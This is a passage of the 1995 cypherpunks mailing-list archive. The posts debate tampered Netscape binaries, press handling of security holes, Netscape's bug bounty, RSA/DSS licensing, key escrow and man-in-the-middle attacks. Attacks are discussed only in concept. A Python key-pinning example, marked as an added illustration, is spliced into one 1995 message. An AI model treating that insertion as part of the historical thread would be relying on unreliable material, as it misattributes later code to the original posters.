> > risk from the nfs problems.  If you get your binary via nfs from a trusted
> > host inaccessible from the internet, then if you have this problem management
> > can handle it as an employee problem;)  There are ways to make secure
> > firewalls, it's fairly well understood.  Sometimes people point to things
> > like the hack Mitnick did last Christmas, but his attack took advantage of
> > a couple of things a security expert shouldn't have allowed, first and
> > foremost two machines were accessible from the internet, and one of them
> > trusted root logins from the other without a password:(
> 
>   It might also be worth noting that people accessing the net
> via an ISP from home do not typically use NFS either.

	And that this is the segment of the user population that is most 
important to commerce online.  But I still hate to see these types of 
solutions being used to try and cover something that should, and could be 
fixed in the underlying protocol itself.  Wouldn't AH and ESP take care of 
a large portion of the existing security holes?  Certainly not all of 
them, but it would solve a lot of problems and make development of secure 
applications much easier.

note: is anyone working on implementing some of the things outlined in 
R(1825?) ?  I think Perry posted regarding it awhile back, but haven't 
heard much about it since.

Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 11 Oct 95 20:08:17 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Elementrix Press Release
In-Reply-To: <199510120222.MAA13959@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9510112226.A75036-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995, Jiri Baum wrote:

> Still, who knows what surprises QM can provide?
> 
> In which case calling it a "telepathic key exchange scheme" might
> be quite appropriate :-)

I don't think that's what was meant. After all, using telepathy as a 
secure channel, you'd still need a comm protocol. The last time I checked
protocols and algorithms are one and the same. Since elementrix doesn't use
algorithms, we shouldn't defame them by claiming they've invented secure
telepathy.        

Now wouldn't that be interesting to patent?
(One wonders if elementrix employees occasionally indulge in guilty 
glances at Knuth and Sedgewick without their bosses' knowledge.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 11 Oct 95 20:28:36 PDT
To: cypherpunks@toad.com
Subject: variations on an attack
Message-ID: <199510120326.XAA10502@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Jiri Baum wrote:
 
> To start a new sub-thread: what if the man in the middle is actually
> a behaviour-modifying parasite? At that stage even a physical meeting
> won't do you much good (the parasite may be otherwise asymptomatic).
 
That wouldn't quite work since the host would notice the parasite in the
middle and could then work out countermeasures.  An important part of a
MITM attack is escaping notice.
 
What if one night the man in the middle drugged you, kidnapped you, placed
you inside a virtual reality machine, replaced your body with a clone, and
established a link between the VR machine and the clone so that you
experience everything the clone experiences and the clone does everything
you intend to do?  Can you prove this has not already happened?

 - the Mad Scientist in the Middle

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHyIA9IjPOsOWLIJAQE3AgP/bNcA0BmDMvto9SocpIcYImoXJ72k9k+Z
gYH6dnCo5UCY0KbKwgCbBfQI0bxpaP7EWmZPS/i1HdzWvKOw9JExY2i0gvKMr/BS
KGtlG0+RAVSU9DiVRuAr6d7x6IQKYOeRgcNz0Dm2JpaA1eo/DbJ3tsRBYCeaQQ26
gS5XzNzL00M=
=lc/J
- -----END PGP SIGNATURE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHyK9SoZzwIn1bdtAQHNsgF/WqMLd/EuNEG3QEXZobZKDQDl0hjMmhBn
56pUQxkNYi0ckMx+YIij9X7XoExm3MsK
=D+xl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 11 Oct 95 21:13:30 PDT
To: sameer@c2.org
Subject: Re: NYT on Internet Flaws
Message-ID: <9510120410.AA28665@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>        I understand though, that we can't control what the reporters
>say and how they interpret what we say. It is very important to word
>your posts carefully such that when you post a bug a reporter won't
>think that they should write an article on it until it is verified.

NO!

Something like Perry's "Do not redistribute without permission" should
be the only modification needed.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Wed, 11 Oct 95 22:36:24 PDT
To: sameer@c2.org (sameer)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120347.UAA27336@infinity.c2.org>
Message-ID: <307ca9244fa4002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, sameer said:
> 
> 	I completely agree that the reporters on this list make things
> very difficult and people do need to be very careful about posting
> things which will get misinterpreted by reporters.. but--
> 
> 	This list is -not- an "announcement" list. If I see a
> potential bug, I want other cypherpunks to tell me whether I am onto
> something or not, so I would post. If some idiot reporter takes that
> and writes an article saying "XXX has a hole" that is -EXTREMELY BAD
> REPORTING-.

It's the "information wants to be free" mindset meeting the "I've got
an hour till deadline and my house payment is due, and if I get 
scooped again I'm out of a job" mentality. (Apologies to the reporters
on the list who work hard to develop stories, and do a good job for
the most part).

What is happening is two different systems are interfacing, and 
the "bad reporting" we see are just translation errors. In the 
many to many system on the net, there is information flowing both
ways, and knowledge is additive. In traditional media, it's a one
way flow, and a "story" is often a one shot information transaction,
with little opportunity built into the paradigm to expand or 
correct the information once it is sent.

Will the interface get better? My hope is that it will, because as 
more and more people get involved in the net, the audience for
traditional media will become more aware of inaccuracies, and 
poor information will be less saleable than it is currently.


-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 11 Oct 95 21:46:56 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought ... [NOISE]
Message-ID: <v02120d03aca20e7c3442@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:27 PM 10/11/95, Alan Horowitz wrote:

>I used to work for SAIC. It's a legitimate beltway-bandito contractor. To
>call it a cover op is sort of missing a point. The government hardly ever
>does _anything_ itself (as, say, percentage of budget). Contractors are
>the ones who do the dirty work in the trenches.

        It's not missing the point at all; what I find particularly
alarming is this half-measure situation we increasingly find ourselves in,
wherein the state farms out the drudgery of being a state but reserves to
itself the prerogative to govern by obscure fiat. Institutions like SAIC
aren't accountable in a way that gov't agencies at least theoretically are,
yet the continuing existence of those agencies amidst this move toward
privatization perpetuates this increasingly mythical idea of
"accountability." If everything's going to go private, fine, whatever,
let's make a go of it, and no one can tell me what software I can/can't use
and how much I can/can't deposit, etc.; OTOH, if the USG wants to reserve
the right to tell me what I can and can't do in these regards, then it had
bloody well better submit to the "responsibility" that goes with that
"right": accountability to the electorate.
        Why do you think the spooks make such prodigious use of cutouts? In
part because it's an effective way of evading detection; and,
unfortunately, oversight is a subset of detection. I'm sure SAIC does tons
of perfectly legitimate contract work--but I'm equally sure that it does
tons of covert work. And far too much covert work is covert for no other
reason than it's stupid (read my lips: "exploding giant clams") or--in the
case at hand--something that a rapidly growing sector of the electorate
rightly regards with suspicion.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Wed, 11 Oct 95 23:49:58 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Moderated: Avoid This Thread
Message-ID: <199510120649.AAA04389@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anon wrote:

>"According to the group's moderator, who prefers to remain anonymous,
> `The most important means to the defense of privacy is encryption.
> Cypherpunks are therefore devoted to cryptography.  They wish to learn
> about it, to teach it and to implement it.'"
>
>Ok, since when is the Cypherpunk's mailing list moderated?

Ummm, anyone seen L.D. lately? 

Just wondering.

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 12 Oct 95 02:23:33 PDT
To: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120005.RAA01681@moosehead.CS.Berkeley.EDU>
Message-ID: <307CD9F9.36CE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul A Gauthier wrote:
> 
> >
> > Patrick Horgan wrote:
> > >
> > > > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> > > >
> > > I'd love to see something in there about most commercial sites being behind
> > > firewalls without nfs access across the firewall.  This greatly reduces the
> >
> >   It might also be worth noting that people accessing the net
> > via an ISP from home do not typically use NFS either.
> >
> 
> They don't often have the skill/knowledge/concern to verify a PGP checksum
> to ensure someone didn't patch their browser, either.

  I don't believe that my posting of PGP signed checksums last night
is a final solution that will make the world safe for all end users.
I'm rather insulted that you imply that I do.  If you read Markoff's
article, you will see that we have stated that we are working on
a more global solution.

> People seem to miss that the NFS hack was only an _example_ of a powerful
> way to silently destroy the integrity of an executable. Spoofing the
> insecure FTP session they used to retrieve it works. Sending them a random
> trojan horse works. The point was not that NFS is insecure. It was that
> unless you can authenticate your executables as being trustworthy NOTHING
> ELSE MATTERS.
> 
> SSL, good RNGs for session key selection, etc, are all null
> and void if you run (any) untrusted software that patches
> your Netscape executable, for example, or if you got a bum copy to
> start with.

  I think everyone agrees that if you don't check the bits you
get from an insecure FTP session, or if you let a bad guy write to
your disk, then you may be in trouble.  The point is that you and a
few reporters are running around yelling at the top of your lungs
that internet commerce is totally doomed because it is possible for
users to infect their systems with viruses.  In the case of
Netscape, users who are worried about their binary being infected
during downloading could actually buy the product, either in their
local computer store or from us directly.

  Perhaps you have a solution to offer to this whole problem?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi
Date: Wed, 11 Oct 95 19:57:11 PDT
To: cypherpunks@toad.com
Subject: netscape rewards bug finders
Message-ID: <9510120245.AA01029@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Netscape Offers Rewards To "Bug Catchers"
MOUNTAIN VIEW, CALIFORNIA, U.S.A., 1995 OCT 11 (NB) -- Netscape
Communications Corporation (NASDAQ: NSCP) has announced the "Netscape Bugs
Bounty" program that rewards users who help the company find and report
"bugs" in the beta versions of its recently released Netscape Navigator 2.0
World Wide Web browser software. Users who are the first to report a
particular bug will be rewarded with various prizes depending on its
importance.

The contest begins with the beta versions of Netscape Navigator 2.0 that are
already on the Internet. Full rules for the contest will be available on
Netscape's home page at http://home.netscape.com .

Speaking to Newsbytes, Roseanne Siino, a spokesperson for Netscape, said, "As
far as we can determine, this is the first contest of its kind. Netscape's
whole approach to broad-based beta testing on the Internet was new, and we
hope the contest will enliven the beta testing process."

Users who are the first to report a particular bug will be rewarded with
prizes depending on the "bug class." Users reporting "significant security
bugs," as determined by Netscape, will collect cash prizes, while users
finding any security bugs will win Netscape "merchandise." Users finding
other "serious" bugs will be eligible to win "a choice of items" from the
Netscape General Store.

Siino pointed out that there are no caps on winners. Top prize will be $1,000
for any and all bugs in the top category: Severe Security Bugs. To win, the
finder has to be the first, and, according to the company, it is important to
be constantly using the current versions.

The beta versions are available now for downloading on the Internet for free
evaluation. Netscape's beta testing of 2.0 is already underway. Users who
downloaded previous beta versions of the 2.0 software should download today's
versions, which fix major and minor bugs identified since its initial
release, including security bugs in the pre-release version of the Java
language support integrated in 2.0.

Netscape has released special beta versions of 2.0 that include Java for
users wanting to test it. Because bugs will be reported and fixed on an
ongoing basis, Netscape asks users to stay current on the beta version they
are using, so that the latest software is constantly being refined.

"We are continuing to encourage users to provide feedback on new versions of
our software, and the Netscape Bugs Bounty is a natural extension of that
process," said Mike Homer, vice president of marketing at Netscape. "By
rewarding users for quickly identifying and reporting bugs back to us, this
program will encourage an extensive, open review of Netscape Navigator 2.0
and will help us to continue to create products of the highest quality."

Netscape has created two versions of its Netscape Navigator 2.0 beta,
available for downloading from Netscape's home page at
http://home.netscape.com . Version b1J for Windows 95, Solaris, and Irix
platforms includes Java and is for users who want to participate in the
bounty program.

For general users or those on other Unix environments, Windows 3.1, and
Macintosh, Netscape has posted beta versions without Java. After initial
testing is complete, future beta versions for all supported platforms will
contain Java.

(Richard Bowers/19951000/Press Contact: Roseanne Siino, Netscape,
415-254-1900)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 00:08:31 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Certificate proposal
In-Reply-To: <199510120147.LAA13833@sweeney.cs.monash.edu.au>
Message-ID: <199510120708.DAA01334@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jiri "Super Trouper" Baum writes:
> To start a new sub-thread: what if the man in the middle is actually
> a behaviour-modifying parasite? At that stage even a physical meeting
> won't do you much good (the parasite may be otherwise asymptomatic).

Descartes figured there was a benevolent God to bail him out. I believe
otherwise. But I manage to go about my business even while wallowing in a
state of Futplexian doubt.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 12 Oct 95 01:16:41 PDT
To: cypherpunks@toad.com
Subject: SUPERWIPE pgp a / uuencode
Message-ID: <199510121156.GAA12642@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

   I used "PGP - A" to armor SUPERWIPE 1.04R for the first 10 C'punks to
request it. I assumed that all the users would be PGP enabled. In case
any one of you weren't, please make another request for SUPERWIPE & specify
that it be sent with UUENCODE armor & I will resend it with the UUENCODE
armor.
                                          Yours Truly,
                                          Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 00:30:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Judicial Access to Keys (Was: Re: Banque des Cypherpunks)
In-Reply-To: <199510112243.SAA21752@universe.digex.net>
Message-ID: <199510120730.DAA01478@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
> I don't remember if any key-splitting schemes currently allow it, but how
> about this:  the escrow agencies would be the courts, requiring one
> assent from each judge on the appeals chain.  As each judge rules
> against the defendant or denies the appeal, he adds his piece of the
> key to the ruling.  When you reach the top of the chain, then *and only
> then* can you be traced.

JAK (Judicial Access to Keys) sounds as though it wouldn't give the LEAs a 
chance to pre-emptively snoop on message traffic before prosecution, unlike
POTS wiretaps and Clipper. I don't see the govt. ever favoring such a
scheme that doesn't help the LEAs to "gather" evidence to justify an
indictment. They will probably skip JAK instead <ducking ;>....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Thu, 12 Oct 95 01:45:30 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510120509.PAA14542@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9510120439.B29690-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995, Jiri Baum wrote:

> > You'd still need an MD5 necktie.
> 
> Actually, you don't - you just don't get signatures without it.
> However, authentication AFAIK was never a problem to export,
> so there's no need to bother.

True, but there's still a licencing requirement in the states (might be 
different up here). So an authentication necktie (as opposed to 
cryptographic shorts and shirts) would be on the principle that one should
not need a licence to write software. 

> Hmm, just like Monopoly money, I guess.
> 
> Nobody's been busted yet for printing that, have they.
They don't care, too easy to counterfeit. Inflation through photocopying
would make monopoly currency as worthless as the funny money it is now.

OTOH, if you threw in strong two-way anon digicash onto a networked version,
you'd basically have a gambling setup masquerading as a MUD. See how long 
that would last unscathed? It would be a nice way to introduce the masses
to the concepts though. Make the code available and you might see servers 
springing up faster than the present digicash casinos. And since any of 
the parties involved might be tempted to cheat ("upgrading" the server in 
the sysadmin's favor, ganging up ...) some authentication might be needed.
Which means even more education for Joe Gambler.

Since doing this for real money, even real digicash, is already illegal 
in many places, it would finally drive home the need for anon security
and crypto to the eager gambler (of which there are many more than eager
pgp users).

If you make it look loony enough, the authorities might find it beneath them
to do anything. Given any success you could launch some additional for-pay 
services based on the same platform.

It's only a game, right?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 12 Oct 95 07:05:56 PDT
To: cypherpunks@toad.com
Subject: Re: MITM evasion MITM evasion
In-Reply-To: <199510112222.SAA21067@universe.digex.net>
Message-ID: <199510121404.HAA07082@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner <sjb@universe.digex.net> writes:

>I see two general categories of MITM attacks.  In one case, Mitch wants
>to eavesdrop on Alice and Bob, but doesn't really care about other
>communication they do.  In the other, Mitch wants to know about all of
>Alice's communications, regardless of with whom they are.

>Public key cryptography turns the first case into two instances of the
>second.  If Mitch doesn't control all of both Alice and Bob's
>communications with everyone, they will eventually discover that the key
>they're using for the other isn't the same one everyone else uses.

This is true, but it doesn't mean that the threat can be neglected.  A
successful MITM attack may be a matter of reading even one message and
acting on it, if the participants don't find out until later that they
were robbed.  In fact, they might not ever notice that the key they
used Tuesday was different from the key they used Thursday, if they
didn't cache the keys.  (Yes, PGP does store the keys in a local key ring
cache but not all systems will necessarily work that way.)

>In the second MITM model, Mitch has an unbelievable task.  Any public
>key that goes from Alice to anyone else, or vice versa, must be
>substituted with one Mitch holds.  Any messages *about* public keys
>must be transformed into messages about the corresponding MITM keys.

>This includes telephone conversations where Alice and Bob exchange
>keyids, the business card Eve has printed with her keyid and gives
>to Alice at Interop, the Betsi key Alice can read in the newspaper,
>WWW pages, files FTP'd, and face-to-face meetings.

Obviously the MITM cannot handle (most) communications taking place
offline.  But there may be a lot of people who don't use any of these
offline methods to validate their keys.  These people don't go to
academic conferences, don't read their key id's over the phone, and
don't print them on business cards (or if they do, they don't get
business cards from those they communicate with securely).  Maybe this
will change, maybe it is a matter of user education, but it is still an
extra effort which will be important to have secure communications.  I
don't think this is widely recognized (other than in the context of the
need for certificates and signed keys).

>Anything short of total control gives Alice an opportunity to learn
>about Mitch's presence.  If Alice can exploit the hole enough to get
>one good key, Mitch must change his tactics to denial of service
>with respect to that key, or Alice can ask the key owner for other
>good keys.

Note too that Mitch is not necessarily taking any risks here even if he
is caught.  "Mitch" could be a remotely operating program, a virus
embedded in Alice's computer or in some link between her system and the
outside world, which is performing these transformations and sending the
decrypted messages out anonymously.  So even if Alice discovers the
trickery there may be no effective way to track down the miscreant.

>If Mitch can successfully surround Alice in such a cloud, I submit
>at least one of the following statements is true:

>1. Alice is such a non-entity that no one really wants to communicate
>with her.

>2. Bob can safely assume that the new key he just got isn't really from
>Alice, because an Alice-with-a-life surrounded by a nearly successful
>Mitch-cloud wouldn't be sending out keys --- she'd be sending out
>messages saying "HELP ME!!  I'M LOCKED IN MITCH'S SECRET BOMB
>SHELTER!!!"

or

3. Mitch's MITM attack is transitory and he doesn't care if he is caught
afterwards, he got his goodies.

or

4. Alice doesn't go to a lot of trouble to check her keys via offline
means.  After all, MITM is so rare it can't happen to her.

Practice safe cryptography!

Hal
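
The key-caching point in the message above, as an added Python example that is not part of the original post: a cache that pins the first key seen for a correspondent catches a key that changes between Tuesday and Thursday, but only an offline fingerprint comparison catches a substitution that was in place from first contact. The class and function names, the sample key bytes and the use of SHA-256 for fingerprints are assumptions of this example.

```python
"""Key-continuity cache: added illustration, not code from the original thread."""
import hashlib


def fingerprint(key_bytes):
    # SHA-256 is this example's choice of fingerprint hash (an assumption).
    return hashlib.sha256(key_bytes).hexdigest()


class KeyCache:
    """Remembers the first key seen for each correspondent and flags changes."""

    def __init__(self):
        self._pins = {}  # identity -> {"fp": hex fingerprint, "verified": bool}

    def observe(self, identity, key_bytes):
        """Call whenever a key arrives over the network for `identity`."""
        fp = fingerprint(key_bytes)
        pin = self._pins.get(identity)
        if pin is None:
            # First contact: nothing to compare against, so this proves nothing.
            self._pins[identity] = {"fp": fp, "verified": False}
            return "new-unverified"
        if pin["fp"] != fp:
            # Tuesday's key differs from Thursday's: keep the old pin and alert.
            return "changed"
        return "match-verified" if pin["verified"] else "match-unverified"

    def confirm_offline(self, identity, fp_from_owner):
        """Compare the pin with a fingerprint obtained offline (phone, card)."""
        pin = self._pins.get(identity)
        if pin is None:
            return "unknown"
        if "".join(fp_from_owner.split()).lower() != pin["fp"]:
            # The key we have been using all along was never the owner's.
            return "pinned-key-is-not-owners"
        pin["verified"] = True
        return "verified"


# Constructed sample values standing in for real public keys.
BOB_KEY = b"constructed-public-key-of-bob"
MITCH_KEY = b"constructed-public-key-held-by-mitch"


def transient_attack():
    """The key is substituted for one message only."""
    cache = KeyCache()
    return [cache.observe("bob", BOB_KEY),     # Tuesday
            cache.observe("bob", MITCH_KEY),   # Thursday, substituted
            cache.observe("bob", BOB_KEY)]     # Friday, back to normal


def attack_from_first_contact():
    """The substitution is in place from the start, so the cache pins it."""
    cache = KeyCache()
    seen = [cache.observe("bob", MITCH_KEY), cache.observe("bob", MITCH_KEY)]
    # Bob reads the fingerprint of his real key over the phone.
    seen.append(cache.confirm_offline("bob", fingerprint(BOB_KEY)))
    return seen


if __name__ == "__main__":
    print(transient_attack())
    print(attack_from_first_contact())
```

A client that keeps no cache has nothing to compare Thursday's key against, which is the case the message warns about.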




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 04:54:17 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510111723.AA17966@all.net>
Message-ID: <199510121157.HAA07110@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Frederick B. Cohen wrote:

| There are also several papers there on "Internet Holes" under Network
| Security in the same on-line journal.  Every month, another 5-10 holes
| are added to those published in this forum.

	And how many of those holes are published by bugtraq/CERT/8lgm
first? Just curious to see if this is another list I should be on...

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 12 Oct 95 08:06:57 PDT
To: cypherpunks@toad.com
Subject: RSA Data Security, Inc. To Exclusively License Rights to RSA
Message-ID: <9509128135.AA813510342@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here's the latest press release from my employer.  As was pointed
out earlier, for those who did not already know, Business Wire articles
are written by companies and distributed to news agencies by BW for a fee.
                --Bob Baldwin

______________________________

RSA Data Security, Inc. To Exclusively License Rights to RSA Public Key 
Encryption and Digital Signature Standard (DSS) Technologies; Company Becomes 
One-Stop Worldwide Source for Encryption Technology

REDWOOD CITY, Calif.--(BUSINESS WIRE)--Oct. 12, 1995--RSA Data Security, Inc. 
today announced that it is now licensing patents for the Digital Signature 
Standard (DSS), the U.S. government standard for digital signatures.

RSA also announced that it has renewed its exclusive licensing agreement for the
industry-standard Rivest-Shamir-Adleman (RSA) public key cryptosystem developed
at the Massachusetts Institute of Technology (MIT). With the addition of DSS
technology to its portfolio of encryption offerings, RSA Data Security has
become the exclusive source for the industry's most widely accepted security
technologies.

RSA also announced that under its uniform, non-discriminatory licensing plan,
manufacturers will pay a one-time royalty when they sell products containing RSA
and/or DSS technology. No additional per-certificate or use charges are
required.

"For the first time, the patents covering the most popular encryption and
digital signature methods in the world, RSA and DSS, are easily available on a
non-discriminatory basis from a single vendor," said Jim Bidzos, president of
RSA. "By offering one-stop shopping for both systems, our customers can
seamlessly integrate both RSA encryption and DSS digital signature methods into
their products."

Widespread Implementation

Many of RSA's software licensees -- such as Adobe, Aquila, Atalla, National 
Semiconductor, Spyrus, Premenos, Spyglass, Terisa Systems, Frontier 
Technologies, BroadVision, Checkpoint Software, Raptor Systems, SafeCo 
Insurance, Wollongong, Square D, Interval Systems, and Comm-Press -- have 
already requested patent licenses to both the RSA and DSS techniques for use in 
software and hardware systems. IBM and Siemens currently offer DSS-based 
products, licensed under RSA's DSS patent, to the U.S. government.

"Now that vendors can obtain DSS and RSA patents from one source, we expect to
see companies throughout the U.S., Europe and Japan incorporate RSA and DSS
technology into dozens of products, including access control systems, network
management systems, smart cards, link encryptors, and wireless encryption
devices," said Bidzos.

"The demand for these technologies is very strong and will continue to grow as
vendors increasingly incorporate security features into their products. In the
next several months we expect to be inundated with requests from licensees. This
is great news for the security industry, which has waited patiently for easy
availability of the RSA and DSS patents."

Digital Signatures

A digital signature on an electronic document is an encrypted form of data 
equivalent to a signature on a printed document, such as a contract or other 
commercial agreement. It verifies that the document is valid and unaltered, and 
that the person signing the document has agreed to its terms.

Furthermore, secure digital signatures cannot be repudiated. The signer of a
document cannot disown it by claiming it was forged. Both DSS and RSA support
digital signatures and certificates. Several states, including California and
Utah have recently enacted legislation recognizing digital signatures as legally
binding.

License Availability

Uniform licenses to both the RSA and DSS/Schnorr patents are available 
immediately. The license text, as well as other information regarding these 
patents, is available on RSA Data Security's home page at http://www.rsa.com.

For existing customers of RSA's BSAFE and TIPEM software toolkits, no separate
patent licenses are required. All rights under the patents to use, integrate and
copy RSA's software are embedded.

RSA Data Security, Inc.

RSA Data Security, Inc. is the world's brand name for cryptography, with more 
than 15 million copies of RSA encryption and authentication technologies 
installed and in use worldwide. RSA technologies are part of existing and 
proposed standards for the Internet and World Wide Web, CCITT, ISO, ANSI, IEEE, 
and business, financial and electronic commerce networks around the globe.

The company develops and markets platform-independent developers kits and 
end-user products and provides comprehensive cryptographic consulting services.

Founded in 1982 by the inventors of the RSA Public Key Cryptosystem, the company
is headquartered in Redwood City, Calif. -0-

Note to Editors: RSA Public Key Cryptosystem, BSAFE and TIPEM are trademarks of 
RSA Data Security, Inc. All other product or company names are trademarks of 
their respective corporations.

For information regarding licensing RSA or DSS patents, contact Paul Livesay at 
RSA Data Security, Inc. (415) 595-8782, or polrsa.com.

For information regarding licensing RSA or DSS toolkits, contact Paul Gordon at 
RSA Data Security, Inc. (415) 595-8782, or paulrsa.com.

--30--kr/sf..

CONTACT: Corman/Croel Marketing & Communications

Patrick Corman, 415/326-9648

cormancerf.net

Lisa Croel, 415/326-0487 lcroelmediacity.com

KEYWORD: CALIFORNIA

INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED TELECOMMUNICATIONS PRODUCT 
REPEATS: New York 212-575-8822 or 800-221-2462; Boston 617-236-4266 or 
800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473 BW URL: 
http://www.hnt.com/bizwire

AP-NY-10-12-95 0701EDT


This material is copyrighted and may not be republished without permission of 
the originating newspaper or wire service. NewsHound is a service of the San 
Jose Mercury News. For more information call 1-800-818-NEWS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 12 Oct 95 00:12:29 PDT
To: sameer <sameer@c2.org>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120421.VAA29813@infinity.c2.org>
Message-ID: <"swan.cl.cam.:277260:951012071149"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Not possible. Reporters don't call you for a quote and then send you a draft
> of the article for your approval before they publish. They call for a quote,
> write their article, and publish, not asking for approval.

Depends how well you train them !

If you can get through to them that it is in their interest to get the facts
right, you may find that they get back to you ...
I try to get them to send the draft as email or fax, but instead I get it read
over the phone to me :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 12 Oct 95 08:21:40 PDT
To: adam@homeport.org
Subject: Re: NYT on Internet Flaws
Message-ID: <9510121517.AA16019@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack sez:
> 
> Dr. Frederick B. Cohen wrote:
> 
> | There are also several papers there on "Internet Holes" under Network
> | Security in the same on-line journal.  Every month, another 5-10 holes
> | are added to those published in this forum.
> 
> 	And how many of those holes are published by bugtraq/CERT/8lgm
> first? Just curious to see if this is another list I should be on...
> 

Well since I see far less than 5-10 announcements from bugtraq, CERT
and 8lgm put together most months, they must have others.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 08:47:21 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307CD9F9.36CE@netscape.com>
Message-ID: <199510121547.IAA02854@moosehead.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff Weinstein wrote:
> > Paul A Gauthier wrote:
> > > Patrick Horgan wrote:
